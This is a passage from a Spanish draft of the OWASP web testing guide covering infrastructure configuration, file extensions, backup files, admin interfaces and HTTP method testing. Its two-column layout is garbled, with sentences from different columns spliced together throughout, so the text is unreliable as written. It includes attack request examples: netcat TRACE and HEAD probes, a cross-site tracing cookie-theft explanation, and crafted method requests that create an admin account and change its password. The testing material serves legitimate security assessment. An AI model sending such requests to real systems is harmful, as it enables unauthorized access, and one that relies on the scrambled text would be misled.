Los proxys inversos también se pueden presentar como proxy-caché para acelerar [1] WebSEAL, también conocido como Tivoli Authentication Manager, es un
el rendimiento de servidores de aplicaciones de acceso restringido (back-end). La proxy inverso de IBM que es parte del framework de Tivoli.
detección de estos proxies puede hacerse a base del encabezado del servidor.
También pueden detectarse tomando el tiempo de las peticiones que deben ser [2] Hay algunas herramientas de administración basadas en GUI para Apache
almacenadas en caché por el servidor de sincronización y comparando el tiempo de (como NetLoony), pero todavía no son de uso generalizado.
la primera solicitud con las solicitudes subsiguientes.
• Los diferentes elementos que conforman la infraestructura deben ser versión del servidor web cuando las vulnerabilidades se arreglan, la herramienta de
determinados con el fin de comprender cómo interactúan con una aplicación web y análisis marcará vulnerabilidades que no existen. Este último caso es realmente
cómo afectan a su seguridad. muy común, ya que algunos proveedores de sistemas operativos instalan parches
para arreglar vulnerabilidades de seguridad a traves de un puerto posterior al
• Todos los elementos de la infraestructura deben revisarse para asegurarse de que software que proporcionan en el sistema operativo, pero no hacen una carga
no contienen vulnerabilidades conocidas. completa de la última versión de software. Esto sucede en la mayoría de las
distribuciones de GNU/Linux como Debian, Red Hat o SuSE. En la mayoría de los
• Debe hacerse una revisión de las herramientas administrativas usadas para dar casos, el análisis de vulnerabilidad de una arquitectura de aplicación sólo
mantenimiento a los diferentes elementos. encontrará vulnerabilidades asociadas a los elementos "expuestos" de la
arquitectura (como el servidor web) y suelen ser incapaces de encontrar
• Los sistemas de autenticación necesitan ser revisados para asegurarse que sirven a vulnerabilidades asociadas a elementos que no están directamente expuestos, tales
las necesidades de la aplicación y que no pueden ser manipulados por los usuarios como la autenticación en segundo plano (back end), o la base de datos acceso
externos para obtener el acceso. restringido, o el proxy inverso que se encuentra en uso.
• Una lista de puertos definidos que se requieren para la aplicación debe recibir
mantenimiento y debe guardarse con un control de cambios.
Por último, no todos los proveedores de software revelan vulnerabilidades de
manera pública y, por lo tanto, estas debilidades no son registradas dentro de bases
de datos de vulnerabilidades conocidas públicamente[1]. Esta información sólo es
Después de haber elaborado un mapa de los diferentes elementos que conforman revelada a los clientes o publicada a través de soluciones que no van acompañadas
la infraestructura (vea mapa de red y arquitectura de la aplicación), es posible de advertencias. Esto reduce la utilidad de las herramientas de análisis de
revisar la configuración de cada elemento encontrado y probarlos en busca de vulnerabilidad. Por lo general, la cobertura de vulnerabilidades de estas
cualquier vulnerabilidad conocida. herramientas será muy buena para los productos comunes (como el servidor web
Apache, Microsoft Internet Information Server o IBM Lotus Domino), pero no
cumplirán con productos menos conocidos.
Cómo probar
Vulnerabilidades conocidas de los servidores Por esta razón, la revisión de vulnerabilidades se realiza mejor cuando al evaluador
se le proporciona información interna del software utilizado, incluyendo versiones
Las vulnerabilidades encontradas en las diferentes áreas de la arquitectura de la y actualizaciones usadas y parches aplicados al software. Con esta información, el
aplicación, ya sea en el servidor web o en la base de datos de acceso restringido, evaluador puede recuperar la información del mismo proveedor y analizar qué
pueden comprometer seriamente a la propia aplicación. Por ejemplo, considere vulnerabilidades pueden estar presentes en la arquitectura y cómo pueden afectar a
una vulnerabilidad del servidor que permite a un usuario remoto no autenticado la aplicación en sí. Cuando sea posible, estas vulnerabilidades pueden analizarse
subir archivos al servidor web o incluso reemplazar los archivos. Esta para determinar sus efectos reales y detectar si pueden haber elementos
vulnerabilidad podría comprometer la aplicación, ya que un usuario granuja
puede ser capaz de reemplazar la aplicación o introducir un código que puede
afectar a los servidores de acceso restringido, ya que el código de la aplicación
del atacante funcionaría como cualquier otra aplicación. externos (tales como sistemas de detección o prevención de intrusiones) que
podrían reducir o negar la posibilidad de explotación exitosa. Los evaluadores
podrían determinar incluso, a través de una revisión de la configuración, que la
vulnerabilidad no está presente, puesto que afecta a un componente de software que
La revisión de vulnerabilidades del servidor puede ser difícil de efectuar si la no está en uso.
prueba debe hacerse a través de una prueba de penetración ciega. En estos casos,
las vulnerabilidades deben probarse desde un sitio remoto, generalmente usando
una herramienta automatizada. Sin embargo, las pruebas de algunas
vulnerabilidades pueden tener resultados impredecibles en el servidor web, y no También vale la pena señalar que los vendedores a veces solucionan las
sería posible probar para otros, (como aquellos directamente involucrados en la vulnerabilidades silenciosamente y hacen las correcciones disponibles con nuevas
negación de ataques al servicio), debido a la reducción de la calidad de tiempo versiones de software. Los diferentes proveedores tendrán diversos ciclos de
de servicio involucrado si la prueba fuera exitosa. lanzamiento que determinan el apoyo que pueden proporcionar para versiones más
antiguas. Un evaluador con información detallada de las versiones del software
utilizado por la arquitectura puede analizar el riesgo asociado al uso de versiones
viejas de software que podrían no tener soporte en el corto plazo o que ya no
Algunas herramientas automatizadas marcan las vulnerabilidades basadas en la tienen soporte. Esto es fundamental, ya que si una vulnerabilidad aparece en una
versión obtenida del servidor web. Esto lleva a falsos positivos y falsos negativos. versión antigua de software, que ya no tiene soporte, el personal de sistemas podría
Por un lado, si la versión del servidor web ha sido eliminada u oscurecida por el no estar directamente consciente de ello. No habrán parches disponibles para él y
administrador del sitio local, la herramienta de análisis no marcará al servidor como las advertencias no pondrán en la lista a esa versión como vulnerable ya que no
vulnerable, aunque lo sea. Por otro lado, si el proveedor del software no actualiza la tiene soporte. Incluso, en el caso de que estén conscientes de que existe la
Documento Pre-release cortesía de Fernando Vela para drangonjar.org
72
Guia de pruebas 4.0 "Borrador"
[2] Tal como Symantec’s Bugtraq, ISS’ X-Force, o NIST’s National Vulnerability
Herramientas administrativas Database (NVD).
Cualquier infraestructura de servidor web requiere la existencia de herramientas [3] Hay algunas herramientas basadas en GUI para Apache (como NetLoony), pero
administrativas para dar mantenimiento y actualizar la información utilizada por la no se usan masivamente todavía.
aplicación. Esta información incluye contenido estático (páginas web, archivos
gráficos), código fuente de la aplicación, bases de datos de autenticación de
usuario, etc. Las herramientas administrativas serán diferentes según el sitio, la
tecnología o el software utilizado. Por ejemplo, algunos servidores se gestionan Pruebe la Configuración de la Plataforma de
mediante interfaces administrativas, que son estos mismos servidores web (como el
servidor web iPlanet) o serán administradas por archivos de texto con la Aplicaciones (OTG-CONFIG-002)
configuración (en caso del Apache[2]) que usen un sistema operativo GUI tools (al
usar el servidor IIS o ASP.Net de Microsoft). Resumen
Después de haber elaborado mapas de las interfaces administrativas utilizadas para Mientras que la instalación tipica del servidor de la web y de la aplicación
administrar las diferentes partes de la arquitectura, es importante revisarla, ya que si contendrá mucha funcionalidad (como ejemplos de aplicación, documentación,
un atacante obtiene acceso a cualquiera de ellas, entonces puede comprometer o páginas de prueba) lo que no es esencial debe retirarse antes de la implementación
dañar la arquitectura de la aplicación. Para ello es importante: para evitar la explotación de estos después de la instalación.
Oracle 9iAS) o CAN-2003-1172 (salto de directorio al ver la muestra de código Es imposible decir genéricamente cómo debe configurarse un servidor, sin
fuente en Cocoon de Apache). embargo, algunas pautas comunes deben tomarse en cuenta:
Los escáneres CGI incluyen una lista detallada de archivos conocidos y las • Sólo habilite módulos de servidor (extensiones ISAPI en IIS) que son necesarios
muestras de directorio que son entregadas por diferentes servidores web o de para la aplicación. Esto reduce la superficie de ataque puesto que el servidor se
aplicaciones, y pueden ser una forma rápida de determinar si estos archivos están reduce en tamaño y complejidad al desactivar módulos del software. También evita
presentes. Sin embargo, la única manera para estar totalmente seguro es hacer una que las vulnerabilidades que podrían aparecer en el software del proveedor afecten
revisión completa de los contenidos del servidor web o servidor de aplicaciones y al sitio si sólo están presentes en los módulos que han sido ya desactivados.
determinar si están relacionados con la aplicación propiamente dicha o no.
• Maneje los errores del servidor (40x o 50x) con páginas personalizadas en vez de
usar las páginas genéricas del servidor web. Específicamente asegúrese de que los
errores de aplicación no serán devueltos al usuario final y que ningún código se
Revisión de comentarios filtre a través de estos errores, ya que esto ayudaría al atacante. Es realmente muy
común olvidar este punto ya que los desarrolladores necesitan esta información en
Es muy común, e incluso se recomienda a los programadores, que incluyan entornos de preproducción.
comentarios detallados en su código fuente para permitir a otros
• Asegúrese de que el software del servidor se ejecuta con privilegios mínimos del
sistema operativo. Esto evita que un error en el software del servidor comprometa
directamente todo el sistema, aunque un atacante podría elevar los privilegios una
programadores entender por qué se tomó una determinada decisión en la vez que ejecute códigos como servidor web.
codificación de una función dada. Los programadores suelen añadir comentarios al
desarrollar aplicaciones grandes basadas en la web. Sin embargo, los comentarios • Asegúrese de que el software de servidor registra correctamente accesos legítimos
incluidos en líneas de código HTML podrían revelar información interna que no y errores.
debería estar disponible para un atacante. A veces, incluso existe el comentario de
haber retirado el código fuente ya que una funcionalidad ya no es necesaria, pero • Asegúrese de que el servidor está configurado para manejar las sobrecargas
este comentario se fuga hacia afuera, a las páginas HTML que se devuelven a los adecuadamente y evitar ataques de denegación de servicio. Asegúrese de que el
usuarios accidentalmente. servidor ha sido calibrado correctamente en su rendimiento.
Revisión de la configuración
• No conceda permisos de escritura a la identidad que el servidor Web utiliza para Registros de Información sensible
tener acceso a applicationHost.config compartida. Esta identidad debe tener
permisos de sólo lectura. Algunas aplicaciones, por ejemplo, podrían utilizar peticiones GET para
enviar datos de formularios que serán vistas en los registros del servidor.
• Utilice una identidad separada para publicar applicationHost.config al recurso Esto significa que los registros de servidor pueden contener información
compartido. No use esta identidad para configurar el acceso a la configuración sensible (como nombres de usuario, como contraseñas o datos
compartida en los servidores Web. bancarios). Esta información sensible puede ser mal utilizada por un
atacante si obtuvo los registros, por ejemplo, a través de interfaces
• Utilice una contraseña de alta seguridad cuando exporte las claves de encriptación administrativas o vulnerabilidades o malas configuraciones conocidas del
para su uso con configuraciones compartidas. servidor web (como la configuración conocida del estado del servidor en
servidores basados en
• Mantenga el acceso restringido a la partición que contiene la configuración
compartida y las claves de encriptado. Si esta partición está comprometida, un Apache HTTP).
atacante podrá leer y escribir cualquier configuración de IIS para los servidores
Web, redirigir el tráfico de su sitio web hacia fuentes maliciosas y, en algunos
casos, obtener el control de todos los servidores web mediante la carga de códigos
arbitrarios en los procesos de trabajo IIS. A menudo, los registros de sucesos contienen datos que son útiles para un
atacante (fuga de información), o pueden ser utilizados directamente en
• Considere proteger esta parte con las reglas del firewall y las directivas de IPsec explotar:
para permitir que únicamente los servidores web miembros se conecten.
• Depuración de la información
Registro
• Rastros de apilamiento
El registro es un aspecto importante de la seguridad de la arquitectura de
una aplicación, ya que puede ser utilizada para detectar fallos en las • Nombres de usuario
aplicaciones (usuarios que intentan constantemente recuperar un archivo
que no existe realmente), así como de ataques sostenidos de los usuarios • Nombres de componentes del sistema
granujas. Los registros no se generan correcta y típicamente por la web y
otro servidor de software. No es común encontrar aplicaciones que • Direcciones IP internas
registran correctamente sus acciones en un registro y, cuando lo hacen, la
intención principal de los registros de aplicación es producir resultados • Datos personales menos sensibles (por ejemplo direcciones de correo electrónico,
de depuración que podría utilizar el programador para analizar un error direcciones postales y números de teléfono asociados con individuos nombrados)
determinado.
• Datos del negocio
• ¿Los datos están siendo validados (min/max longitud, caracteres etc.) antes de ser • Fichas de acceso
registrados?
• Datos personales sensibles y algunas formas de información personal identificable
(PII)
• Contraseñas de autenticación en la misma partición de disco como el que se usa para el software de
sistema operativo o la aplicación en sí. Esto significa que si el disco fuera
• Líneas de conexión de bases de datos llenado, el sistema operativo o la aplicación pueden fallar porque serían
incapaces de escribir en el disco.
• Claves de encriptación
Almacenamiento de registros
Esta característica debe ser probada para asegurarse de que:
• Los registros se comprimen una vez rotados (esto es una comodidad, ya que
significará que más registros se almacenarán en el mismo espacio de disco
lenaría el espacio asignado para los archivos de registro si no están disponible).
prevenidos específicamente de hacerlo. Sin embargo, si el servidor no
está configurado correctamente, los archivos de registro se almacenarán
Documento Pre-release cortesía de Fernando Vela para drangonjar.org
76
Guia de pruebas 4.0 "Borrador"
• El permiso del sistema de archivos de registros rotados es el mismo (o más Las estadísticas del registro o análisis no deben ser generadas ni
estricto) que los permisos del registro de archivos en sí. Por ejemplo, los servidores almacenadas en el mismo servidor que produce los registros. De lo
web deberán escribir en los registros usados, pero no necesitan realmente escribir contrario, un atacante podría, a través de una vulnerabilidad del servidor
en registros rotados, lo que significa que los permisos de los archivos pueden web o configuración inadecuada, tener acceso a ellos y recuperar la
modificarse según la rotación para evitar que el proceso del servidor web los información similar a la que sería revelada por los archivos de registro.
modifique.
Referencias
Algunos servidores podrían rotar registros cuando alcanzan un tamaño
determinado. Si esto sucede, se debe garantizar que un atacante no puede [1] Apache
obligar a rotar registros para ocultar sus huellas.
• Apache Security, by Ivan Ristic, O’reilly, March 2005.
La información del registro de eventos nunca debe ser visible para los • Apache Security Secrets: Revealed, ApacheCon 2002, Las Vegas, Mark J Cox,
usuarios finales. Incluso los administradores web no deberían ver estos October 2002 - awe.com
registros ya que se rompe la separación del servicio de las labores de
control. Asegúrese de que cualquier esquema de control de acceso que se • Performance Tuning - apache.org
utiliza para proteger el acceso a los registros brutos y a cualquier
aplicación que proporciona funcionalidades para ver o buscar los [2] Lotus Domino
registros no estén
• Lotus Security Handbook, William Tworek et al., April 2004, available in
the IBM Redbooks collection - redbooks.ibm.com
conectadas a los esquemas de control de acceso para otros roles de • Lotus Domino Security, an X-force white-paper, Internet Security Systems,
usuario de la aplicación. Asimismo, los datos de registro no deben ser December 2002 - iss.net
visibles por los usuarios no autenticados.
• Hackproofing Lotus Domino Web Server, David Litchfield, October 2001 -
davidlitchfield.com
Para analizar los ataques desde el servidor web, los archivos de registro
• Securing Your Web Server (Patterns and Practices), Microsoft Corporation,
de error deben ser analizados. La revisión debería centrarse en: January 2004
• 40x mensajes de error (not found). Una gran cantidad de ellos de la misma fuente • From Blueprint to Fortress: A Guide to Securing IIS 5.0, by John Davis,
podría ser un indicativo de una herramienta de scanner CGI utilizada contra el Microsoft Corporation, June 2001 -
servidor web
uat.technet.microsoft.com
• 50 x mensajes (server error). Estos pueden ser una indicación de que un atacante
abusa de partes de la aplicación que fallan inesperadamente. Por ejemplo, las • Secure Internet Information Services 5 Checklist, by Michael Howard,
primeras fases de un ataque de inyección SQL producirá estos mensaje de error Microsoft Corporation, June 2000
cuando la consulta SQL no está construida correctamente y su ejecución falla en la
base de datos de acceso restringido. • “INFO: Using URLScan on IIS” - support.microsoft.com
[4] Red Hat’s (formerly Netscape’s) iPlanet debido a que el contenido no es el esperado, o por manejo de nombres de
archivo inesperado del OS.
• Guide to the Secure Configuration and Administration of iPlanet Web
Server, Enterprise Edition 4.1, by James M Hayes - nsa.gov
[5] WebSphere Determinar cómo los servidores web manejan las peticiones
correspondientes a archivos con diferentes extensiones puede ayudar a
• IBM WebSphere V5.0 Security, WebSphere Handbook Series, by Peter comprender el comportamiento del servidor web según el tipo de
Kovari et al., IBM, December 2002 - redbooks.ibm.com archivos a los que se accede. Por ejemplo, puede ayudar a entender cuáles
extensiones de archivo se devuelven como texto simple frente a aquellos
• IBM WebSphere V4.0 Advanced Edition Security, by Peter Kovari et al., que causan alguna ejecución en el lado del servidor. Estos últimos son
IBM, March 2002 - redbooks.ibm.com indicativos de las tecnologías, idiomas o plugins que son utilizados por los
servidores web o servidores de aplicaciones y pueden proporcionar
[6] General
informacion adicional de cómo está diseñada la aplicación web. Por
ejemplo, una extensión de ".pl" es generalmente asociada con un soporte
• Logging Cheat Sheet, OWASP
Perl del lado del servidor. Sin embargo, la extensión de archivo sola
puede ser engañosa y no completamente concluyente. Por ejemplo, Los
• SP 800-92 Guide to Computer Security Log Management, NIST
recursos de servidor Perl pueden cambiarse de nombre para ocultar el
csrc.nist.gov
hecho de que están relacionados con Perl. Vea la siguiente sección sobre
• PCI DSS v2.0 Requirement 10 and PA-DSS v2.0 Requirement 4, PCI "componentes de servidor de web" para más información sobre
Security Standards Council identificación de componentes y tecnologías del lado del servidor.
[7] Generic:
• CERT Security Improvement Modules: Securing Public Web Servers Cómo probar
• “How To: Use IISLockdown.exe” - Envíe solicitudes http[s] que incluyan diferentes extensiones y verifique
cómo se manejan. La verificación debe estar en una base de directorio
http://msdn.microsoft.com/library/en-us/secmod/html/secmod113.asp web
Resumen
Los archivos de extensiones se utilizan en los servidores web para Si la arquitectura de aplicaciones web tiene balanceo de cargas, es
determinar fácilmente qué tecnologías, idiomas y accesorios (plugins) importante evaluar a todos los servidores web. Esto puede o no ser fácil,
deben utilizarse para cumplir con la solicitud web. Si bien este dependiendo de la configuración de la infraestructura de equilibrio. En
comportamiento es compatible con los RFC y estándares Web, utilizar las una infraestructura con componentes redundantes pueden existir ligeras
extensiones de archivo estándar proporciona al evaluador de penetración variaciones en la configuración de los servidores web o de aplicaciones
la información útil sobre las tecnologías subyacentes que se utilizan en individuales . Esto puede suceder si la arquitectura web emplea
una aplicación web y simplifica enormemente la tarea de determinar el tecnologías heterogéneas (piense en un conjunto de servidores web IIS y
escenario de ataque a usar para estas tecnologías en particular. Además, Apache en una configuración de balanceo de carga, que puede presentar
un error de configuración de los servidores web fácilmente podría revelar leves comportamientos asimétricos entre ellos y posiblemente diferentes
información confidencial sobre las credenciales de acceso. vulnerabilidades).
El evaluador ha identificado la existencia de un archivo llamado algunos ejemplos, ya que las extensiones de archivo son demasiadas para
connection.inc. Tratar de acceder a él directamente le devuelve su tratarlas exhaustivamente aquí. Refiérase a http://filext.com/ para ver
contenido: una base de datos más completa de las extensiones.
<?
Para identificar los archivos con una extensión en particular, puede
mysql_connect(“127.0.0.1”, “root”, “”)
emplearse una mezcla de técnicas. Estas técnicas pueden incluir
escáneres de vulnerabilidad, herramientas de robots araña (spidering) y
or die(“Could not connect”);
de reflejo,
?>
inspección manual de la aplicación (esto supera las limitaciones del uso
de robots araña automáticos), consultar motores de búsqueda (ver
El evaluador determina la existencia de un MySQL DBMS de acceso
pruebas: spidering y googling). Vea también pruebas de archivos viejos,
restringido y las credenciales (débiles) que utiliza la aplicación web para
de copia de seguridad y archivos no referenciados que abordan los
acceder a ella.
problemas de seguridad relacionados con los archivos "olvidados".
Si la aplicación web se basa en una infraestructura heterogénea con equilibrio credenciales para conectarse a la interfaz administrativa o al servidor de
de carga, la misma determina si esta puede presentar un comportamiento base de datos.
diferente.
• wget - gnu.org
Es fácil olvidar este tipo de archivos y esto puede plantear una amenaza
• curl - curl.haxx.se
seria a la aplicación. Eso sucede porque se pueden generar copias de
seguridad con extensiones de archivo diferentes a las de los archivos
• google for “web mirroring tools”.
originales. Un archivo .tar, .zip o .gz que generamos (y olvidamos...)
obviamente tiene una extensión diferente, y lo mismo ocurre con las
copias automáticas creadas por muchos editores (por ejemplo, emacs
genera una copia de seguridad denominada archivo~ al editar el archivo).
Revise archivos viejos, copias de seguridad y Hacer una copia a mano puede producir el mismo efecto (piensa en
copiar file a file.old). El sistema de archivo subyacente, en el cual se
archivos no referenciados en busca de encuentra la aplicación, podría estar tomando "instantáneas" de su
información sensible (OTG-CONFIG-004) aplicación en diferentes puntos en el tiempo sin su conocimiento, y
también pueden ser accesibles a través de la web. Estas representan una
Resumen amenaza de estilo similar, pero diferentes al tipo "archivo de respaldo" de
su aplicación.
Mientras que la mayoría de los archivos en un servidor web son
manejados directamente por el servidor, no es raro encontrar archivos no
referenciados u olvidados que pueden utilizarse para obtener
información importante acerca de la infraestructura o las credenciales. Como resultado, estas actividades generan archivos que no son
necesarios para la aplicación y pueden ser tratados de manera distinta al
archivo original por el servidor web. Por ejemplo, si hacemos una copia
de login.asp llamada login.asp.old, estamos permitiendo a los usuarios
Los escenarios más comunes incluyen la presencia de viejas versiones descargar el código de login.asp. Esto es porque login.asp.old será
renombradas de archivos modificados, archivos de inclusión que se atendido normalmente como texto simple, en lugar de ser ejecutado
cargan debido a su extensión. En otras palabras, acceder a login.asp causa la
ejecución del código de login.asp, mientras que acceder a login.asp.old
causa que el contenido de login.asp.old (que es, otra vez, el código del
lado del servidor) se entregue simplemente al usuario y se muestre en el
en el idioma de su preferencia y pueden ser descargados como fuente, o evaluador. Esto puede plantear riesgos de seguridad, dado que
incluso copias de seguridad manuales o automáticas o en forma de información confidencial puede ser revelada.
archivos comprimidos. Los archivos de copias de seguridad también
pueden ser generados automáticamente por el sistema de archivos
subyacente donde se aloja la aplicación, una característica que se conoce
generalmente como "instantáneas". En general, exponer el código del lado del servidor es una mala idea. No
sólo está usted innecesariamente exponiendo la lógica del negocio, sino
que, sin saberlo, usted puede estar develando información relacionada
con la aplicación, lo que puede ayudar a un atacante (nombres de ruta de
Todos estos archivos podrán conceder acceso al evaluador a trabajos acceso, estructuras de datos, etc.). Por no mencionar el hecho de que hay
internos, puertas traseras, interfaces administrativas o incluso muchos scripts que tienen incrustado el usuario y contraseña en texto
claro (que es una práctica imprudente y muy peligrosa).
Disallow: /~jbloggs
Las secciones de comentarios y comentarios de eliminación de los
programadores del código fuente pueden referirse al contenido oculto: Disallow: /include
#!/bin/bash
var adminUser=false;
:
server=www.targetapp.com
if (adminUser) menu.add (new menuItem (“Maintain users”,
“/admin/useradmin.jsp”)); port=80
Dependiendo del servidor, GET puede ser reemplazado con HEAD para
tener resultados más rápidos. El archivo de salida especificado puede
usar la aplicación grep para obtener los códigos de respuesta
"interesantes". El código de respuesta 200 (OK) normalmente indica que
se ha encontrado un recurso válido (siempre y cuando el servidor no
Otra fuente de pistas sobre los directorios no referenciados es el archivo de
entregue una página personalizada de "no encontrada"(not found) con el
/robots.txt utilizado para dar instrucciones a los robots de la web:
código 200). Pero también 302 (Found), 401 (Unauthorized), 403
(Forbidden) y 500 (Internal error), que también pueden indicar recursos
o directorios que son dignos de una investigación posterior.
Nota: Las operaciones de copia de archivos de Windows generan archivos • Además, Google y Yahoo mantienen versiones en caché de páginas
con nombres con el prefijo "Copia de" (Copy of) o versiones localizadas de encontradas por sus robots. Incluso si 1998results.asp ha sido eliminado del
esta cadena, por lo tanto, no cambian las extensiones de archivo. Mientras servidor de destino, una versión de salida puede todavía estar almacenada en
que los archivos "Copia de" (Copy of) típicamente no revelan el código estos motores de búsqueda. La versión en caché puede contener referencias o
fuente cuando se acceden, podrían entregar información valiosa en caso pistas sobre contenido oculto adicional que permanece en el servidor.
de que provoquen errores cuando se les invoca.
• El contenido que no está referenciado desde una aplicación de destino puede
estar vinculado a sitios web de terceros. Por ejemplo, una aplicación que
procesa los pagos en línea a nombre de comerciantes externos puede contener
Información obtenida a través de las vulnerabilidades y mala una variedad de funcionalidades hechas a la medida que pueden
configuración (normalmente) sólo se pueden encontrar (normalmente) siguiendo los enlaces
dentro de las páginas web de sus clientes.
La manera más obvia en que un servidor mal configurado puede revelar
páginas no referenciadas es a través del listado del directorio. Solicite
todos los directorios enumerados para identificar cualquiera que
proporcione un listado de directorios. Filtro de desvío del nombre del archivo
• Apache ?M=D directory listing vulnerability. Ejemplo: Expansión de nombre de archivo 8.3 de Windows "c:\program
files" se convierte "C:\PROGRA~1"
• Various IIS script source disclosure vulnerabilities.
– Remove incompatible characters
• IIS WebDAV directory listing vulnerabilities.
– Convert spaces to underscores
– Add “~<digit>” which is used to distinguish files with names using the same six Para garantizar una estrategia de protección efectiva, la prueba debe
initial characters estar compuesta por una política de seguridad que específicamente
prohíbe las prácticas peligrosas tales como:
- This convention changes after the first 3 cname ollisions
•Las herramientas robot tipo araña: wget (gnu.org, interlog.com); Sam Spade Deny from all
(samspade.org); Spike Proxy incluyen una función de rastreador del sitio web
(immunitysec.com); Xenu (home.snafu.de); Curl (curl.haxx.se). Algunos de </Location>
ellos también se incluyen en las distribuciones estándar de Linux.
Las interfases del administrador se pueden presentar en la aplicación o enviadas al cliente, enlaces a las funcionalidades de administrador, pueden
en el servidor de aplicaciones para permitir que determinados usuarios descubrirse y deben investigarse.
puedan llevar a cabo actividades privilegiadas en el sitio. Se deben
realizar pruebas para revelar sí y cómo esta funcionalidad privilegiada
puede ser accesada por un usuario no autorizado o estándar.
• Revisar el servidor y la documentación de aplicaciones. Si el servidor de
aplicaciones o la aplicación se implementa en su configuración por defecto, es
posible acceder a la interfaz de administración con la información descrita
Una aplicación puede requerir una interfaz de administrador para
habilitar un usuario con privilegios con acceso a funciones que pueden
realizar cambios de cómo funciona el sitio. Tales cambios pueden incluir:´
en la documentación de configuración o ayuda. Las listas de contraseñas por
defecto deben consultarse si se encuentra una interfaz administrativa y se requieren
credenciales.
• Provisionamiento de cuentas de usuario
• Información disponible para el público p. Muchas aplicaciones como wordpress
• Diseño y diagramación del sitio tienen interfaces administrativas por defecto.
• Manipulación de datos • Puerto de servidor alternativo. Las interfaces de administración pueden ser
encontradas en un puerto diferente en el host de la aplicación principal. Por
• Cambios en la configuración ejemplo, a menudo puede verse la interfaz de administración de Apache Tomcat en
el puerto 8080.
Cómo Probar
En la siguiente sección se describen vectores que pueden utilizarse para o en una cookie:
probar la presencia de interfaces administrativas. Estas técnicas también
pueden utilizarse para probar temas relacionados que incluyen la Cookie: session_cookie; useradmin=0
elevación de privilegios y se describen en otros sitios de esta guía (por
ejemplo Pruebas para eludir el esquema de autorización (OTG-AUTHZ-
002) y Pruebas de referencias de objetos directos inseguros (OTG-
AUTHZ-004) en mayor detalle.
Aunque GET y POST son los métodos más comunes que se utilizan para
acceder a la información proporcionada por un servidor web, el protocolo
El código fuente debe ser revisado para asegurar que el modelo de de transferencia de hipertexto (HTTP) permite varios otros métodos( y
autorización y autenticación garantiza la separación clara de funciones algunos menos conocidos). RFC 2616 (que describe al HTTP versión 1.1
entre los usuarios normales y los administradores. Las funciones de la que es el estándar hoy en día) define los siguientes ocho métodos:
interfaz de usuario compartidas entre usuarios normales y
administradores deben ser revisadas para garantizar una separación
clara entre el dibujo de dichos componentes y la información que puede
fugarse de tal funcionalidad. • HEAD
• GET
Herramientas • POST
• PUT
• Dirbuster este proyecto OWASP actualmente inactivo sigue siendo una gran • DELETE
herramienta para forzar directorios y archivos en el servidor.
• TRACE
• THC-HYDRA es una herramienta que permite forzar muchas interfaces,
incluyendo la autenticación HTTP basada en formularios. • OPTIONS
• Un forzador es mucho mejor cuando usa un buen diccionario, por ejemplo, el • CONNECT
diccionario de netsparker.
Pruebe los métodos HTTP (OTG-CONFIG- • DELETE: Este método permite a un cliente eliminar un archivo en el
006) servidor web. Un atacante puede explotarlo como una forma muy simple
y directa para modificar un sitio web o para montar un ataque DoS.
OPTIONS / HTTP/1.1
Host: www.victim.com
Métodos HTTP Arbitrarios
En muchos casos, el código que comprueba explícitamente un método Nota: para entender la lógica y los objetivos de este ataque, uno debe
"GET" o "POST" sería seguro. estar familiarizado con los ataques de Cross Site Scripting.
• Aprovechando una vulnerabilidad del lado del cliente: el atacante crea un sitio
$ nc www.victim.com 80
web malicioso que contiene el fragmento del código hostil de JavaScript y
aprovecha alguna vulnerabilidad entre dominios del navegador de la víctima ,
TRACE / HTTP/1.1
para que el código JavaScript pueda realizar con éxito una conexión con el sitio
que soporta el método TRACE y que originó la cookie que el atacante está
Host: www.victim.com
tratando de robar.
HTTP/1.1 200 OK
Información más detallada, junto con ejemplos de código, puede
encontrarse en el documento original escrito por Jeremiah Grossman.
Server: Microsoft-IIS/5.0
Content-Type: message/http Encuentre una página para visitar que tenga una restricción de seguridad
que normalmente obligaría una redirección 302 hacia una página de
Content-Length: 39 registro o fuerce un registro directamente. La URL de la prueba en este
ejemplo funciona así, como lo hacen muchas aplicaciones web. Sin
embargo, si un evaluador obtiene una respuesta "200" que no es una
página de registro, es posible eludir la autenticación y autorización.
TRACE / HTTP/1.1
Si el framework, firewall o la aplicación no admite el método de "JEFF",
debe $emitir una página de error
nc www.example.com 80 (o preferiblemente un 405 Not Allowed o
501 Not implemented error page). Si sirve a la solicitud, es vulnerable a
El contenido de la respuesta es exactamente una copia de nuestra este problema.
JEFF / HTTP/1.1
petición original, lo que significa que el objetivo permite este método.
Ahora, ¿dónde está el peligro acechando? Si el evaluador indica un Host: www.example.com
navegador para emitir una petición TRACE al servidor web, y este
navegador tiene una cookie para ese dominio, la cookie se incluirá Si el evaluador siente que el sistema es vulnerable a este problema, debe
automáticamente en los encabezados de la solicitud y, por lo tanto, se publicar ataques tipo CSRF para explotar el tema más plenamente:
HTTP/1.1 200 OK
muestran en la respuesta resultante. En ese momento, la cadena de la
cookie será accesible por JavaScript y será finalmente posible enviarla a
Date: Mon, 18 Aug 2008 22:38:40 GMT
un tercero, así la cookie esté etiquetada como httpOnly.
• FOOBAR/admin/createUser.php?member=myAdmin
Server: Apache
• JEFF/admin/changePw.php?member=myAdmin&passwd=
Set-Cookie: PHPSESSID=K53QW...
Hay varias maneras de hacer que un navegador emita una solicitud
foo123&confirm=foo123
TRACE, tales como el control XMLHTTP ActiveX en Internet Explorer y
XMLDOM en Mozilla y Netscape. Sin embargo, por razones de seguridad,
• CATS /admin/groupEdit.php?group=Admins&member=myAd
al navegador se le permite iniciar una conexión sólo con el dominio donde
reside el script hostil. Este es un factor atenuante, ya que el atacante debe
min&action=add
combinar el método TRACE con otra vulnerabilidad para montar el
ataque.
Con suerte, usando los tres comandos anteriores que han sido
modificados para adaptarse a la aplicación sometida a la prueba y los
Un atacante tiene dos formas de lanzar con éxito un ataque de Cross Site
requisitos de prueba, se debe crear un nuevo usuario, con una contraseña
Tracing:
asignada y hacelo administrador.
Pruebas para omitir el control de acceso HEAD Si el evaluador piensa que el sistema es vulnerable a este problema, debe
emitir ataques tipo CSRF para explotar el tema más plenamente:
Encuentre una página para visitar que tenga una restricción de seguridad
que normalmente obligaría una redirección 302 a una página de registro
o fuerce un registro directamente. La URL de prueba en este ejemplo
funciona así, como lo hacen muchas aplicaciones web. Sin embargo, si el • HEAD /admin/createUser.php?member=myAdmin
evaluador obtiene una respuesta "200" que no es una página de inicio de
sesión, es posible eludir la autenticación y autorización. • HEAD /admin/changePw.php?member=myAdmin&passwd=
foo123&confirm=foo123
$ nc www.example.com 80
• HEAD /admin/groupEdit.php?group=Admins&member=myAd
HEAD /admin HTTP/1.1
min&action=add
Host: www.example.com
Server: Apache
Pragma: no-cache
Referencias
